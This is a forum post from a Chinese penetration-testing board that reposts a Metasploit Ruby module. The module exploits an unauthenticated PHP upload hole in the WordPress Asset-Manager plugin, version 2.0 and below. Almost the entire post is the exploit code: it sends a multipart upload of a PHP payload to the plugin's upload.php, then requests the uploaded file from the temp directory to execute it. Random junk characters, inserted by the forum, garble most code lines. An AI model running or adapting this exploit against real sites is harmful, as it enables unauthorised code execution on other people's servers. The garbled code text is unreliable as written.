找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 WordPress Asset-Manager PHP文件上传漏洞
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1858|回复: 0
打印 上一主题 下一主题

WordPress Asset-Manager PHP文件上传漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-31 09:22:33 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。8 R# d. E& H  @& }0 s$ o# D
- C' W* G# k6 v+ @! a
##7 K  J' B$ X. R$ O
# This file is part of the Metasploit Framework and may be subject to  L" |9 [; ]  `7 S0 b: G4 U  \; _7 v4 q
# redistribution and commercial restrictions. Please see the Metasploit. Q  p6 a/ Y- L' E# S
# Framework web site for more information on licensing and terms of use.
+ m% f; i# ?( |/ M, `7 ^9 v#   http://metasploit.com/framework/
: r7 ~9 t& R2 [2 s( ]& x##
" g, G5 F/ r2 Y9 P9 I* i 3 s' S( O, q/ F4 B; P
require 'msf/core'
4 I  @3 y, ], r9 s: C2 j' Trequire 'msf/core/exploit/php_exe'
( X7 I* ~0 H" F9 ?, c* ?' K! c7 Q 0 b+ E( v! k% \$ a
class Metasploit3 < Msf::Exploit::Remote" C2 N( g! p& {3 g
  Rank = ExcellentRanking
0 i. ]' k" m, z" s. d% ?- O
; `1 j4 Y+ d3 Y: g# f  include Msf::Exploit::Remote::HttpClient
% j8 m* b# G. Z. d5 {6 y  include Msf::Exploit:hpEXE
3 L7 }- g/ ~; Z. C+ J + E- n1 p+ a; G7 Z  l, N
  def initialize(info = {})- a" P  ~% Q  c0 m
    super(update_info(info,$ x' y2 d) Z5 ]: V  f- W, x7 R; e$ ^
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',* a/ M# N, q6 V2 ?5 [$ H* _
      'Description'    => %q{: Y& z; N) c2 e! C! z" X6 ~! a
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress9 h0 Z. ?4 B9 j6 `9 @- @+ k
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a. m" p: a. f7 Y) U* r+ x
        temp directory without authentication, which results in arbitrary code execution.
4 G3 z8 v9 \; E  o7 H* `! r( i      },  h- D' I2 @4 a" z  o" j
      'Author'         =>
- W7 C/ h# y, l        [. N( z1 I; o: V: l
          'Sammy FORGIT', # initial discovery3 V0 P, P) k/ a- k7 A
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module  G4 w7 J4 I& H% q
        ],6 A, A, U% @- ^5 B! \
      'License'        => MSF_LICENSE,
4 q: b9 j6 _' u3 i; X+ q$ q& T5 M      'References'     =>
, w( M1 ~2 _5 @  D5 f0 f        [* v& F0 b) _8 ]* v- e
          [ 'OSVDB', '82653' ],
7 y" m7 S5 D. f3 ^4 O( I  s: F          [ 'BID', '53809' ],
7 i& V/ x0 W0 Z          [ 'EDB', '18993' ],
& ?- i+ u+ W% V& [) M. y3 B6 b          [ 'URL', 'http:// www.myhack58.com /' ]6 o- p6 e6 j; j3 s& i  G
        ],/ l( l( M5 d, F# ]! P
      'Payload'       =>
5 }) O! b+ I# t2 o8 L' ^        {
+ c) B1 O5 g% F! N+ w" c8 D          'BadChars' => "\x00",3 N2 B: Z! k9 f6 ?% Z
        },) s1 t) t: L7 D; A9 H4 O( C3 w
      'Platform'       => 'php',/ `( d8 ]; W  P# o$ J
      'Arch'           => ARCH_PHP,
7 x: ]( V% r$ j% v* O. E      'Targets'        =>
! v0 S+ _5 h, p, ~7 k        [6 P8 l! z! N: r! m- M2 r- v
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],  H- U7 H6 s( {" K& O( A* m
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
- C' b: G3 |8 @$ H' {4 I        ],
, t) x0 d1 X+ t4 O      'DefaultTarget' => 0,
/ p+ d# \! p1 \7 O2 Z; N; }7 _: d      'DisclosureDate' => 'May 26 2012')): A5 j' {1 d& w  r

5 w) w( r* e# G8 f0 {7 e    register_options(
4 x4 F' L% c! l8 L9 v      [
6 T' T, M* `% _: U' J        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])% ^' o+ C. |' L, z: q
      ], self.class)
6 s0 \& g0 M* N  end( F$ ]' c  m7 ?/ u
/ A( k: {; b, i! u9 b5 P1 x- ~# L7 N
  def exploit
0 @/ r. _" i% a    uri =  target_uri.path( p7 ?$ }" h1 d, ]1 }1 e+ z! N
    uri << '/' if uri[-1,1] != '/'
3 j+ A% k( m, R    peer = "#{rhost}:#{rport}"
; I2 s: n6 I4 W    payload_name = "#{rand_text_alpha(5)}.php"
4 l9 _( }  R% ?2 x3 E    php_payload = get_write_exec_payload(:unlink_self=>true)
, Q" T- g# G! U6 o4 R
8 v: s( A, ?  U5 m    data = Rex::MIME::Message.new5 Y- k& R& }# Y+ W4 n
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
5 q. ~' c' B; o* C2 H8 m    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
& A5 K, G1 m* G# i' a: E* o
8 K7 ]- n: S! y- w    print_status("#{peer} - Uploading payload #{payload_name}")
+ W8 ~0 p3 q$ ]3 r) X    res = send_request_cgi({. n8 Q6 M3 `" t  a  R) C& A3 X9 J
      'method'  => 'POST',- a( l. i2 T$ _( Z" Y! a
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",; v9 s3 t/ z7 x: G! r2 C
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",* [4 W$ u' K4 S+ x; \
      'data'    => post_data( q, l% ^* x1 l9 ]* s
    })
, y/ s' M% z7 h3 M* f: O) @9 e
/ L7 F, }6 k; }* N! L    if not res or res.code != 200 or res.body !~ /#{payload_name}/
  [& u$ B+ E: M8 N      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
8 l; v* t0 N' p0 k* Fend
6 R$ v7 P: `) G3 v$ f/ G8 o - v+ O% b" w' t0 s% r% s4 t: f
    print_status("#{peer} - Executing payload #{payload_name}")! U$ r: U! Y/ J
    res = send_request_raw({* x+ a8 n# F8 E. D
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
) h5 T, u- }6 y- G      'method'  => 'GET'
) f) v: m' ^$ E& k% u    })" _' I6 X( `; L( j, j3 z) b
/ e6 ^, Q3 L/ f# r' ?
    if res and res.code != 200/ n2 j: T8 V, [; L: u) ?
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")7 ~2 J7 H* m- ~3 w# x
    end
/ [9 V# _- H7 ?  end+ P' ?" c; a* s5 |. J6 C
end
" |* C" c: W: D
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表